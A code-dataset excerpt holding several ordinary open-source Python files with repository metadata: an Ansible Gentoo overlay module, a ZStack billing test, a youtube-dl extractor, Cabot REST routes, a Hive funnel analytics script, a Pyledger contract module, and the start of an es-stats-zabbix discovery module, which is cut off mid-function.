| code (string, 3-1.05M chars) | repo_name (string, 5-104 chars) | path (string, 4-251 chars) | language (1 class) | license (15 classes) | size (int64, 3-1.05M) |
|---|---|---|---|---|---|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Jakub Jirutka <jakub@jirutka.cz>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: layman
author: "Jakub Jirutka (@jirutka)"
version_added: "1.6"
short_description: Manage Gentoo overlays
description:
    - Uses Layman to manage additional repositories for the Portage package manager on Gentoo Linux.
      Please note that Layman must be installed on a managed node prior to using this module.
requirements:
- "python >= 2.6"
- layman python module
options:
name:
description:
- The overlay id to install, synchronize, or uninstall.
Use 'ALL' to sync all of the installed overlays (can be used only when C(state=updated)).
required: true
list_url:
description:
      - The URL of an alternative overlays list that defines the overlay to install.
        This list will be fetched and saved under C(${overlay_defs}/${name}.xml), where
        C(overlay_defs) is read from Layman's configuration.
required: false
state:
description:
- Whether to install (C(present)), sync (C(updated)), or uninstall (C(absent)) the overlay.
required: false
default: present
choices: [present, absent, updated]
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be
set to C(no) when no other option exists. Prior to 1.9.3 the code
defaulted to C(no).
required: false
default: 'yes'
choices: ['yes', 'no']
version_added: '1.9.3'
'''
EXAMPLES = '''
# Install the overlay 'mozilla' which is on the central overlays list.
- layman:
name: mozilla
# Install the overlay 'cvut' from the specified alternative list.
- layman:
name: cvut
list_url: 'http://raw.github.com/cvut/gentoo-overlay/master/overlay.xml'
# Update (sync) the overlay 'cvut', or install if not installed yet.
- layman:
name: cvut
list_url: 'http://raw.github.com/cvut/gentoo-overlay/master/overlay.xml'
state: updated
# Update (sync) all of the installed overlays.
- layman:
name: ALL
state: updated
# Uninstall the overlay 'cvut'.
- layman:
name: cvut
state: absent
'''
import shutil
from os import path
try:
from layman.api import LaymanAPI
from layman.config import BareConfig
HAS_LAYMAN_API = True
except ImportError:
HAS_LAYMAN_API = False
USERAGENT = 'ansible-httpget'
class ModuleError(Exception):
pass
def init_layman(config=None):
'''Returns the initialized ``LaymanAPI``.
:param config: the layman's configuration to use (optional)
'''
if config is None:
config = BareConfig(read_configfile=True, quietness=1)
return LaymanAPI(config)
def download_url(module, url, dest):
'''
:param url: the URL to download
:param dest: the absolute path of where to save the downloaded content to;
it must be writable and not a directory
:raises ModuleError
'''
# Hack to add params in the form that fetch_url expects
module.params['http_agent'] = USERAGENT
response, info = fetch_url(module, url)
if info['status'] != 200:
raise ModuleError("Failed to get %s: %s" % (url, info['msg']))
try:
with open(dest, 'w') as f:
shutil.copyfileobj(response, f)
except IOError as e:
raise ModuleError("Failed to write: %s" % str(e))
def install_overlay(module, name, list_url=None):
    '''Installs the overlay repository. If the overlay is not on the central
    overlays list, then the URL of an alternative list must be provided via
    :list_url. The list will be fetched and saved under
    ``%(overlay_defs)s/%(name)s.xml`` (the location of ``overlay_defs`` is
    read from Layman's configuration).
:param name: the overlay id
:param list_url: the URL of the remote repositories list to look for the overlay
definition (optional, default: None)
    :returns: True if the overlay was installed, or False if it already exists
        (i.e. nothing has changed)
:raises ModuleError
'''
# read Layman configuration
layman_conf = BareConfig(read_configfile=True)
layman = init_layman(layman_conf)
if layman.is_installed(name):
return False
if module.check_mode:
mymsg = 'Would add layman repo \'' + name + '\''
module.exit_json(changed=True, msg=mymsg)
if not layman.is_repo(name):
if not list_url:
raise ModuleError("Overlay '%s' is not on the list of known " \
"overlays and URL of the remote list was not provided." % name)
overlay_defs = layman_conf.get_option('overlay_defs')
dest = path.join(overlay_defs, name + '.xml')
download_url(module, list_url, dest)
# reload config
layman = init_layman()
if not layman.add_repos(name):
raise ModuleError(layman.get_errors())
return True
def uninstall_overlay(module, name):
'''Uninstalls the given overlay repository from the system.
:param name: the overlay id to uninstall
    :returns: True if the overlay was uninstalled, or False if it doesn't exist
        (i.e. nothing has changed)
:raises ModuleError
'''
layman = init_layman()
if not layman.is_installed(name):
return False
if module.check_mode:
mymsg = 'Would remove layman repo \'' + name + '\''
module.exit_json(changed=True, msg=mymsg)
layman.delete_repos(name)
if layman.get_errors():
raise ModuleError(layman.get_errors())
return True
def sync_overlay(name):
'''Synchronizes the specified overlay repository.
:param name: the overlay repository id to sync
:raises ModuleError
'''
layman = init_layman()
if not layman.sync(name):
messages = [ str(item[1]) for item in layman.sync_results[2] ]
raise ModuleError(messages)
def sync_overlays():
'''Synchronize all of the installed overlays.
:raises ModuleError
'''
layman = init_layman()
for name in layman.get_installed():
sync_overlay(name)
def main():
# define module
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True),
list_url = dict(aliases=['url']),
state = dict(default="present", choices=['present', 'absent', 'updated']),
validate_certs = dict(required=False, default=True, type='bool'),
),
supports_check_mode=True
)
if not HAS_LAYMAN_API:
module.fail_json(msg='Layman is not installed')
state, name, url = (module.params[key] for key in ['state', 'name', 'list_url'])
changed = False
try:
if state == 'present':
changed = install_overlay(module, name, url)
elif state == 'updated':
if name == 'ALL':
sync_overlays()
elif install_overlay(module, name, url):
changed = True
else:
sync_overlay(name)
else:
changed = uninstall_overlay(module, name)
except ModuleError as e:
        module.fail_json(msg=str(e))
else:
module.exit_json(changed=changed, name=name)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
if __name__ == '__main__':
main()
| bearstech/ansible | lib/ansible/modules/packaging/os/layman.py | Python | gpl-3.0 | 7,605 |
'''
New tests for billing operations
'''
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.operations.billing_operations as bill_ops
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
import zstackwoodpecker.operations.net_operations as net_ops
import threading
import time
import os
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
def create_bill(price, resource_name, time_unit, resource_unit):
test_util.test_logger('Create resource price')
inv = bill_ops.create_resource_price(resource_name, time_unit, price, resource_unit=resource_unit).dateInLong
return inv
def query_resource_price(uuid = None, price = None, resource_name = None, time_unit = None, resource_unit = None):
cond = []
if uuid:
cond = res_ops.gen_query_conditions('uuid', "=", uuid, cond)
if price:
cond = res_ops.gen_query_conditions('price', "=", price, cond)
if resource_name:
cond = res_ops.gen_query_conditions('resourceName', "=", resource_name, cond)
if time_unit:
cond = res_ops.gen_query_conditions('timeUnit', "=", time_unit, cond)
if resource_unit:
cond = res_ops.gen_query_conditions('resourceUnit', "=", resource_unit, cond)
result = bill_ops.query_resource_price(cond)
return result
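# Illustrative call (not part of the original test): fetch every price defined
# for one resource with a per-second time unit:
#   query_resource_price(resource_name='pubIpVmNicBandwidthIn', time_unit='s')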
def delete_price(price_uuid, delete_mode = None):
test_util.test_logger('Delete resource price')
result = bill_ops.delete_resource_price(price_uuid, delete_mode)
return result
def create_vm(name, image_uuid, host_uuid, instance_offering_uuid, l3_uuid, session_uuid=None):
vm_creation_option = test_util.VmOption()
vm_creation_option.set_name(name)
vm_creation_option.set_instance_offering_uuid(instance_offering_uuid)
vm_creation_option.set_image_uuid(image_uuid)
vm_creation_option.set_l3_uuids([l3_uuid])
if host_uuid:
vm_creation_option.set_host_uuid(host_uuid)
if session_uuid:
vm_creation_option.set_session_uuid(session_uuid)
vm = test_stub.create_vm(vm_creation_option)
return vm
def test():
# test_stub.update_billing_symbol()
cond = res_ops.gen_query_conditions('system', '=', 'false')
imageUuid = res_ops.query_resource_fields(res_ops.IMAGE, cond)[0].uuid
cond = res_ops.gen_query_conditions('type', '=', 'UserVm')
instanceOfferingUuid = res_ops.query_resource_fields(res_ops.INSTANCE_OFFERING, cond)[0].uuid
cond = res_ops.gen_query_conditions('name', '=', 'public network')
l3NetworkUuids = res_ops.query_resource_fields(res_ops.L3_NETWORK, cond)[0].uuid
vm_name = 'vm-1'
create_bill(1, "pubIpVmNicBandwidthIn", "s", "m")
resourcePrices = query_resource_price()
for resource_price in resourcePrices:
delete_price(resource_price.uuid)
    ## create bills in parallel
counter = 0
for i in range(0, 200):
ipin = threading.Thread(target=create_bill, args=(i, "pubIpVmNicBandwidthIn", "s", "k"))
ipout = threading.Thread(target=create_bill, args=(i, "pubIpVmNicBandwidthOut", "m", "m"))
vipin = threading.Thread(target=create_bill, args=(i, "pubIpVipBandwidthIn", "h", "g"))
vipout = threading.Thread(target=create_bill, args=(i, "pubIpVipBandwidthOut", "d", "m"))
while threading.active_count() > 10:
time.sleep(3)
ipin.start()
ipout.start()
vipin.start()
vipout.start()
    resourcePrices = query_resource_price()
    ## wait up to ~18 seconds for all 800 prices to be created
i = 0
while len(resourcePrices) != 800:
print len(resourcePrices)
time.sleep(3)
if i > 5:
test_util.test_fail("Fail to create 800 prices")
i = i + 1
resourcePrices = query_resource_price()
#Delete all price
for resource_price in resourcePrices:
delete_price(resource_price.uuid)
ipin = threading.Thread(target=create_bill, args=(10, "pubIpVmNicBandwidthIn", "s", "m"))
ipout = threading.Thread(target=create_bill, args=(10, "pubIpVmNicBandwidthOut", "s", "m"))
vipin = threading.Thread(target=create_bill, args=(10, "pubIpVipBandwidthIn", "s", "m"))
vipout = threading.Thread(target=create_bill, args=(10, "pubIpVipBandwidthOut", "s", "m"))
ipin.start()
ipout.start()
vipin.start()
vipout.start()
#Create vm nic qos
net_bandwidth = 10*1024*1024
    vm = create_vm(vm_name, imageUuid, None, instanceOfferingUuid, l3NetworkUuids)
vm_inv = vm.get_vm()
vm_nic = test_lib.lib_get_vm_nic_by_l3(vm_inv, l3NetworkUuids)
vm_ops.set_vm_nic_qos(vm_nic.uuid, outboundBandwidth = net_bandwidth, inboundBandwidth = net_bandwidth)
cond = res_ops.gen_query_conditions('name', '=', 'admin')
time.sleep(1)
admin_uuid = res_ops.query_resource_fields(res_ops.ACCOUNT, cond)[0].uuid
prices = bill_ops.calculate_account_spending(admin_uuid)
if prices.total < 180:
test_util.test_fail("test billing fail, bill is lesser than 180 after vm nic qos set")
#Delete vm nic qos
vm_ops.del_vm_nic_qos(vm_nic.uuid, "in")
vm_ops.del_vm_nic_qos(vm_nic.uuid, "out")
time.sleep(1)
# Total cost should not grow up
price1 = bill_ops.calculate_account_spending(admin_uuid)
time.sleep(2)
price2 = bill_ops.calculate_account_spending(admin_uuid)
if price1.total != price2.total:
test_util.test_fail("test billing fail, bill still grows up after deleting vm nic qos. price1 total: %s, price2 total: %s" % (price1.total, price2.total))
#Delete vm nic resource price
price_ipin = query_resource_price(resource_name = "pubIpVmNicBandwidthIn")[0]
price_ipout = query_resource_price(resource_name = "pubIpVmNicBandwidthOut")[0]
delete_price(price_ipin.uuid)
delete_price(price_ipout.uuid)
price3 = bill_ops.calculate_account_spending(admin_uuid)
#make sure vm nic resource price has been deleted
price_ipin = query_resource_price(resource_name = "pubIpVmNicBandwidthIn")
price_ipout = query_resource_price(resource_name = "pubIpVmNicBandwidthOut")
if len(price_ipin) > 0 or len(price_ipout)> 0:
test_util.test_fail("Fail to clean vm nic resource price. length of pubIpVmNicBandwidthIn: %d, length of pubIpVmNicBandwidthOut: %d" %(len(price_ipin), len(price_ipout)))
# price.total should not grow up, after the prices are deleted
price4 = bill_ops.calculate_account_spending(admin_uuid)
if price4.total != price3.total:
test_util.test_fail("test billing fail, bill still grows up after deleting prices. price4 total:%s, price3 total: %s" % (price4.total, price3.total))
#create vip qos
vip = test_stub.create_vip("test_vip_qos_price", l3NetworkUuids)
vip_uuid = vip.get_vip().uuid
vip_qos = net_ops.set_vip_qos(vip_uuid=vip_uuid, inboundBandwidth = net_bandwidth, outboundBandwidth = net_bandwidth)
time.sleep(1)
prices = bill_ops.calculate_account_spending(admin_uuid)
if prices.total < 180:
print prices.total
test_util.test_fail("test billing fail, bill is lesser than 180 after vip qos set")
#Delete vip qos
net_ops.delete_vip_qos(vip_uuid)
time.sleep(1)
# Total cost should not grow up
price1 = bill_ops.calculate_account_spending(admin_uuid)
time.sleep(2)
price2 = bill_ops.calculate_account_spending(admin_uuid)
if price1.total != price2.total:
test_util.test_fail("test billing fail, bill still grows up after deleting vip qos. price1 total: %s, price2 total: %s" % (price1.total, price2.total))
#Delete vip resource price
price_vipin = query_resource_price(resource_name = "pubIpVipBandwidthIn")[0]
price_vipout = query_resource_price(resource_name = "pubIpVipBandwidthOut")[0]
delete_price(price_vipin.uuid)
delete_price(price_vipout.uuid)
price3 = bill_ops.calculate_account_spending(admin_uuid)
    #make sure vip resource price has been deleted
price_vipin = query_resource_price(resource_name = "pubIpVipBandwidthIn")
price_vipout = query_resource_price(resource_name = "pubIpVipBandwidthOut")
if len(price_vipin) > 0 or len(price_vipout)> 0:
test_util.test_fail("Fail to clean vip resource price. length of pubIpVipBandwidthIn: %d, length of pubIpVipBandwidthOut: %d" %(len(price_vipin), len(price_vipout)))
    # price.total should not grow after the prices are deleted
price4 = bill_ops.calculate_account_spending(admin_uuid)
if price4.total != price3.total:
test_util.test_fail("test billing fail, bill is still grows up after deleting vip prices. price4 total: %s, price3 total: %s" % (price4.total, price3.total))
test_util.test_pass("test billing pass")
def error_cleanup():
pass
| zstackio/zstack-woodpecker | integrationtest/vm/simulator/public_billing/test_public_ip_biling.py | Python | apache-2.0 | 8,861 |
from __future__ import unicode_literals
from .common import InfoExtractor
class WorldStarHipHopIE(InfoExtractor):
_VALID_URL = r'https?://(?:www|m)\.worldstar(?:candy|hiphop)\.com/(?:videos|android)/video\.php\?.*?\bv=(?P<id>[^&]+)'
_TESTS = [{
'url': 'http://www.worldstarhiphop.com/videos/video.php?v=wshh6a7q1ny0G34ZwuIO',
'md5': '9d04de741161603bf7071bbf4e883186',
'info_dict': {
'id': 'wshh6a7q1ny0G34ZwuIO',
'ext': 'mp4',
'title': 'KO Of The Week: MMA Fighter Gets Knocked Out By Swift Head Kick!'
}
}, {
'url': 'http://m.worldstarhiphop.com/android/video.php?v=wshh6a7q1ny0G34ZwuIO',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
entries = self._parse_html5_media_entries(url, webpage, video_id)
if not entries:
return self.url_result(url, 'Generic')
title = self._html_search_regex(
[r'(?s)<div class="content-heading">\s*<h1>(.*?)</h1>',
r'<span[^>]+class="tc-sp-pinned-title">(.*)</span>'],
webpage, 'title')
info = entries[0]
info.update({
'id': video_id,
'title': title,
})
return info
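# A minimal usage sketch (illustrative, not part of the original file); the
# extractor is normally exercised through the public YoutubeDL API once
# youtube-dl is installed, rather than by instantiating this class directly.
if __name__ == '__main__':
    import youtube_dl
    ydl_opts = {'skip_download': True}  # fetch metadata only, no video download
    with youtube_dl.YoutubeDL(ydl_opts) as ydl:
        info = ydl.extract_info(
            'http://www.worldstarhiphop.com/videos/video.php?v=wshh6a7q1ny0G34ZwuIO',
            download=False)
        print(info.get('title'))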
| vinegret/youtube-dl | youtube_dl/extractor/worldstarhiphop.py | Python | unlicense | 1,344 |
from django.db import models as model_fields
from django.conf import settings
from django.conf.urls import url, include
from django.contrib.auth import models as django_models
from polymorphic import PolymorphicModel
from cabot.cabotapp import models, alert
from rest_framework import routers, serializers, viewsets, mixins
import logging
logger = logging.getLogger(__name__)
router = routers.DefaultRouter()
def create_viewset(arg_model, arg_fields, arg_read_only_fields=(), no_create=False):
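    """Build a ModelSerializer + ViewSet pair for ``arg_model`` that exposes
    ``arg_fields`` (plus ``id`` and any ``arg_read_only_fields``). With
    ``no_create=True`` the returned viewset omits the create action;
    polymorphic models are queried via ``instance_of`` so concrete subclasses
    are handled.
    """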
arg_read_only_fields = ('id',) + arg_read_only_fields
for field in arg_read_only_fields:
if field not in arg_fields:
arg_fields = arg_fields + (field,)
class Serializer(serializers.ModelSerializer):
class Meta:
model = arg_model
fields = arg_fields
read_only_fields = arg_read_only_fields
viewset_class = None
if no_create:
class NoCreateViewSet(mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
mixins.ListModelMixin,
viewsets.GenericViewSet):
pass
viewset_class = NoCreateViewSet
else:
viewset_class = viewsets.ModelViewSet
arg_queryset = None
if issubclass(arg_model, PolymorphicModel):
arg_queryset = arg_model.objects.instance_of(arg_model)
else:
arg_queryset = arg_model.objects.all()
class ViewSet(viewset_class):
queryset = arg_queryset
serializer_class = Serializer
ordering = ['id']
filter_fields = arg_fields
return ViewSet
check_group_mixin_fields = (
'name',
'users_to_notify',
'alerts_enabled',
'status_checks',
'alerts',
'hackpad_id',
)
router.register(r'services', create_viewset(
arg_model=models.Service,
arg_fields=check_group_mixin_fields + (
'url',
'instances',
'overall_status',
),
))
router.register(r'instances', create_viewset(
arg_model=models.Instance,
arg_fields=check_group_mixin_fields + (
'address',
'overall_status',
),
))
status_check_fields = (
'name',
'active',
'importance',
'frequency',
'debounce',
'calculated_status',
)
router.register(r'status_checks', create_viewset(
arg_model=models.StatusCheck,
arg_fields=status_check_fields,
no_create=True,
))
router.register(r'icmp_checks', create_viewset(
arg_model=models.ICMPStatusCheck,
arg_fields=status_check_fields,
))
router.register(r'graphite_checks', create_viewset(
arg_model=models.GraphiteStatusCheck,
arg_fields=status_check_fields + (
'metric',
'check_type',
'value',
'expected_num_hosts',
'allowed_num_failures',
),
))
router.register(r'http_checks', create_viewset(
arg_model=models.HttpStatusCheck,
arg_fields=status_check_fields + (
'endpoint',
'username',
'password',
'text_match',
'status_code',
'timeout',
'verify_ssl_certificate',
),
))
router.register(r'jenkins_checks', create_viewset(
arg_model=models.JenkinsStatusCheck,
arg_fields=status_check_fields + (
'max_queued_build_time',
),
))
# User API is off by default, could expose/allow modifying dangerous fields
if settings.EXPOSE_USER_API:
router.register(r'users', create_viewset(
arg_model=django_models.User,
arg_fields=(
'password',
'is_active',
'groups',
#'user_permissions', # Doesn't work, removing for now
'username',
'first_name',
'last_name',
'email',
),
))
router.register(r'user_profiles', create_viewset(
arg_model=models.UserProfile,
arg_fields=(
'user',
'fallback_alert_user',
),
))
router.register(r'shifts', create_viewset(
arg_model=models.Shift,
arg_fields=(
'start',
'end',
'user',
'uid',
'deleted',
)
))
router.register(r'alertplugins', create_viewset(
arg_model=alert.AlertPlugin,
arg_fields=(
'title',
)
))
| cmclaughlin/cabot | cabot/rest_urls.py | Python | mit | 4,286 |
# -*- coding: utf-8 -*-
"""
author: ferris
function: trace the trigger actions and their prior actions for funnel, and add source tags to funnel steps
"""
from pyhive import hive
import pandas as pd
import numpy as np
import datetime
import os
# def in_manually():
# df = pd.read_csv('./data_hive.csv', delimiter='\t')
# df.columns = ['user_id', 'mysql_id', 'time', 'sn', 'action', 'category', 'page_name', 'session_id',
# 'platform', 'app_marketing_version', 'data_date']
# return df
def hive_to_df(sql=""):
"""
execute sql in hive and return pandas DataFrame
Args:
sql: sql string
Returns: pandas DataFrame
"""
print('connecting')
cursor = hive.connect('localhost').cursor()
print('query start')
cursor.execute(sql)
cont = cursor.fetchall()
cols = cursor.description
col_names = [j[0] for j in cols]
tmp_data = pd.DataFrame(data=cont, columns=col_names)
return tmp_data
def df_to_hive(file_dir, file_name, hdfs_dir, table_name, date_str):
"""
copy local file into HDFS directory, and load into external partition table
Args:
file_dir: file directory
file_name: file name
hdfs_dir: HDFS directory
table_name: hive table name
date_str: date partition string
Returns: None
"""
print("copy to hdfs")
hdfs_cmd = "hadoop fs -cp {0}{1} {2}".format(file_dir, file_name, hdfs_dir)
os.system(hdfs_cmd)
print("load into hive")
cli_cmd = "load data inpath {0}{1} into table {2} partition(data_date={3})" \
.format(hdfs_dir, file_name, table_name, date_str)
hive_cmd = "hive -e '{0}' ".format(cli_cmd)
os.system(hive_cmd)
print("load complete")
return None
def file_to_sql(file_path):
    """
    generate a single-line sql string from a sql script
    Args:
        file_path: sql script
    Returns: sql string
    """
    with open(file_path, 'r') as f_in:
        sql_lines = [r.strip() for r in f_in]
    return ' '.join(sql_lines)
def set_route(df):
"""
define a route column for tagging record type:
1. funnel
2. entrances: the actions to trigger the funnel
3. actions: the necessary prior actions to entrances
Returns: pandas DataFrame
"""
# add blank column
df['route'] = ''
# define funnel
df.loc[df['page_name'].isin(['order', 'order_pay']) | (df['action'] == 'click_pay'), 'route'] = 'f'
# define entrance for funnel
df.loc[(df['action'] == 'click_buy_cc') & (df['page_name'] == 'course_intro_ccbasic'), 'route'] = 'e1'
df.loc[(df['action'] == 'start_buy_cc') & (df['page_name'] == 'view_improve_plan'), 'route'] = 'e2'
df.loc[(df['action'] == 'click_buy'), 'route'] = 'e3'
# define prior actions for entrance
df.loc[df['action'].isin(
['click_cc_buy_in_badge', 'click_cc_buy_in_rank', 'click_cc_purchaseinfo_pic', 'click_cc_purchaseinfo_text',
'click_lesson_in_store', 'click_more_lesson', 'click_grab']), 'route'] = 'a1'
df.loc[df['action'].isin(['confirm_daily_studytime']), 'route'] = 'a2'
# remove useless data
df = df[df['route'] != '']
df = df.reset_index(drop=True)
return df
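# A minimal sketch of set_route on synthetic rows (illustrative only):
#   df = pd.DataFrame({
#       'action': ['click_buy_cc', 'click_pay', 'click_grab'],
#       'page_name': ['course_intro_ccbasic', 'order_pay', 'store'],
#   })
#   set_route(df)['route'].tolist()  # -> ['e1', 'f', 'a1']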
def work_flow(start_date, end_date):
"""
read data, add source tags to funnel records, output to hive
Args:
start_date: 'yyyy-mm-dd' string
end_date: 'yyyy-mm-dd' string
Returns: None
"""
# read data from hive
# set start_date to 1 day before
start_value = datetime.date(int(start_date[0:4]), int(start_date[5:7]), int(start_date[8:])) - datetime.timedelta(
days=1)
start_str = start_value.isoformat()
end_str = end_date
hql = file_to_sql('./data_hive.hql').format(start_str, end_str)
df = hive_to_df(sql=hql)
# pre-allocate series
source_e = pd.Series('', index=np.arange(df.shape[0])) # tracking entrances
source_a = pd.Series('', index=np.arange(df.shape[0])) # tracking actions prior to entrances
# init trackers
print("init trackers")
rt_a = tr_a = tr_e = tr_l = tr_p = tr_u = tr_v = 'unknown'
# update & apply trackers
for i, row in df.iterrows():
if i % 500 == 0:
print("step {0}".format(str(i)))
# reset on new user, platform, version
if (row['mysql_id'] != tr_u) or (row['platform'] != tr_p) or (row['app_marketing_version'] != tr_v):
rt_a = tr_a = tr_e = tr_l = 'unknown'
        # update action tracker (track both the action name and its route tag,
        # so the a1/e1, a2/e2 match below can fire)
        if row['route'][0] == 'a':
            tr_a = row['action']
            rt_a = row['route']
# bind actions to entrances when they match, update entrance tracker
elif row['route'][0] == 'e':
if rt_a[1] == row['route'][1]:
source_a[i] = tr_a
tr_l = tr_a
tr_e = row['action']
# bind actions and entrances to funnel
elif row['route'] == 'f':
source_e[i] = tr_e
source_a[i] = tr_l
else:
source_e[i] = 'unknown'
source_a[i] = 'unknown'
# update other trackers for the same user, platform, version
tr_p = row['platform']
tr_u = row['mysql_id']
tr_v = row['app_marketing_version']
# remove useless data
print('clean results')
df['source_e'] = source_e
df['source_a'] = source_a
flt = df[df['route'] == 'f']
flt = flt[~(flt['source_e'] == 'click_buy')] # remove irrelevant funnel
flt = flt[flt['data_date'].between(start_date, end_date)]
print(1.0 * (flt['source_e'] != 'unknown').sum() / flt.shape[0])
print(1.0 * (flt['source_a'] != 'unknown').sum() / flt.shape[0])
# percent of source tracked
flt.groupby(['source_e']).apply(lambda x: x.shape[0])
flt.groupby(['source_a']).apply(lambda x: x.shape[0])
# output to file
out_name = 'tmp_out_{0}'.format(end_date[1:-1])
flt.to_csv(out_name, header=None, index=None, sep='\t')
# output to hive
out_table = "cc_funnel_source"
df_to_hive(file_dir=os.system("pwd"),
file_name=out_name,
hdfs_dir="s3://warehouse/analysis/{0}/".format(out_table),
table_name=out_table,
date_str=end_date)
if __name__ == "__main__":
    # work_flow requires start/end dates; the original call omitted them, so
    # read them from the command line as 'yyyy-mm-dd' strings (assumption)
    import sys
    work_flow(sys.argv[1], sys.argv[2])
# df = in_manually()
# df = set_route(df)
# xx = df[df['data_date']=='2016-06-11']
# xx = xx[xx['page_name']=='course_intro_ccbasic']
# yy = xx[xx['source']=='unknown']
| ferris-wufei/toolbox | dw/dw_funnel_source/archive/funnel_source.py | Python | gpl-2.0 | 6,513 |
# Pyledger. A simple ledger for smart contracts implemented in Python
# Copyright (C) 2017 Guillem Borrell Nogueras
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import abc
import datetime
import inspect
from pyledger.server.db import DB, Contract, Status
from pyledger.server.status import SimpleStatus
contract_registry = {}
class BaseContract(abc.ABC):
pass
class SimpleContract(BaseContract):
"""
Contract that uses SimpleStatus for serialization.
    The goal of this class is to make a contract feel just like a Python class.
"""
_status_class = SimpleStatus
BaseContract.register(SimpleContract)
def methods(contract):
"""
Obtain methods from the contract
:param contract:
:return:
"""
methods = {}
for name, function in inspect.getmembers(contract,
predicate=inspect.ismethod):
if not name == '__init__':
methods[name] = function
return methods
def api(contract):
api_spec = {}
contract_methods = methods(contract)
for method in contract_methods:
function_spec = {}
sig = inspect.signature(contract_methods[method])
for param in sig.parameters:
function_spec[param] = sig.parameters[param].annotation
api_spec[method] = function_spec
return api_spec
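# Illustrative output (not from the original source): for a contract exposing
# ``def add(self, a: int, b: int)``, api(contract) yields
# ``{'add': {'a': <class 'int'>, 'b': <class 'int'>}}`` (bound methods drop
# ``self``; unannotated parameters map to ``inspect.Parameter.empty``).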
def signatures(contract):
contract_signatures = {}
contract_methods = methods(contract)
for k, method in contract_methods.items():
contract_signatures[k] = inspect.signature(method)
return contract_signatures
def status(contract):
all_attributes = inspect.getmembers(
contract,
predicate=lambda a: not(inspect.isroutine(a)))
attributes = {}
for attribute in all_attributes:
if not attribute[0].startswith('_'):
attributes[attribute[0]] = attribute[1]
return contract._status_class(**attributes)
def register_contract(contract, description=''):
"""
    Register a contract and persist its genesis status to the database
:param contract:
:param description:
:return:
"""
global contract_registry
if contract.__class__.__name__ in contract_registry:
        raise ValueError('A contract with the same name is already registered')
else:
contract_registry[contract.__class__.__name__] = contract
db_contract = Contract()
db_contract.name = contract.__class__.__name__
db_contract.created = datetime.datetime.now()
db_contract.description = description
first_status = Status()
first_status.contract = db_contract
first_status.when = datetime.datetime.now()
first_status.attributes = status(contract).dump()
# Genesis key is the name of the contract
first_status.key = contract.__class__.__name__.encode('utf-8')
DB.session.add(db_contract)
DB.session.add(first_status)
DB.session.commit()
| guillemborrell/pyledger | pyledger/server/contract.py | Python | agpl-3.0 | 3,527 |
"""
Discovery-related Resource Classes for flask_restful
"""
import json
import logging
from flask import request
from flask_restful import Resource
from es_stats_zabbix.exceptions import NotFound
from es_stats_zabbix.defaults.settings import APIS
from es_stats_zabbix.helpers.batch import get_endpoints, lldoutput, macrogen
from es_stats_zabbix.helpers.config import extract_endpoints
from es_stats_zabbix.helpers.utils import get_nodeid, get_cluster_macros, get_node_macros
class Discovery(Resource):
"""
Endpoint Discovery Resource Class for flask_restful
"""
def __init__(self, statobjs, do_not_discover, endpoints):
self.statobjs = statobjs
self.dnd = do_not_discover
self.raw_endpoints = endpoints
self.logger = logging.getLogger('esz.Discovery')
def get(self):
"""GET method"""
return self.post()
def post(self):
"""POST method"""
endpoints = extract_endpoints(self.raw_endpoints)
node = None
show_all = False
self.logger.debug('request.data contents = {}'.format(request.data))
if request.data != b'':
# Must decode to 'utf-8' for older versions of Python
json_data = json.loads(request.data.decode('utf-8'))
node = json_data['node'] if 'node' in json_data else None
show_all = json_data['show_all'] if 'show_all' in json_data else False
results = macrogen(self.statobjs, self.dnd, node=node,
included=None if show_all else endpoints)
llddata = lldoutput(results)
return {'data': llddata}
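# Illustrative Discovery POST body (an assumption, inferred from the keys
# parsed above): {"node": "node-1", "show_all": true}. The reply is
# {"data": [...]} where each entry is a Zabbix low-level-discovery macro dict.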
class ClusterDiscovery(Resource):
"""
Cluster and Node Discovery Resource Class for flask_restful
"""
def __init__(self, statobjs):
self.logger = logging.getLogger('esz.ClusterDiscovery')
self.statobjs = statobjs
self.statobj = statobjs['nodeinfo']
self.nodeinfo = self.statobj.cached_read('nodeinfo')['nodes']
def get(self, value):
"""GET method"""
return self.post(value)
def post(self, value):
"""POST method"""
self.logger.debug('request.data contents = {}'.format(request.data))
flag = None
if request.data != b'':
# Must decode to 'utf-8' for older versions of Python
json_data = json.loads(request.data.decode('utf-8'))
flag = json_data['flag'] if 'flag' in json_data else None
if flag:
# Placeholder if needed.
pass
macros = []
if value == 'cluster':
nodeid = list(self.nodeinfo.keys())[0]
self.logger.debug('Value is "cluster." Returning LLD data for the cluster...')
self.logger.debug('Using nodeid {0} for cluster data'.format(nodeid))
macros.append(get_cluster_macros(self.statobj, nodeid))
elif value == 'nodes':
self.logger.debug('Value is "nodes." Returning LLD data for all discovered nodes...')
for nodeid in self.nodeinfo:
macros.append(get_cluster_macros(self.statobj, nodeid))
return {'data': macros}
class NodeDiscovery(Resource):
"""
Node Discovery Resource Class for flask_restful
"""
def __init__(self, statobjs):
self.logger = logging.getLogger('esz.NodeDiscovery')
self.statobjs = statobjs
self.statobj = statobjs['nodeinfo']
self.nodeinfo = self.statobj.cached_read('nodeinfo')['nodes']
def get(self, node):
"""GET method"""
return self.post(node)
def post(self, node):
"""POST method"""
self.logger.debug('request.data contents = {}'.format(request.data))
flag = None
if request.data != b'':
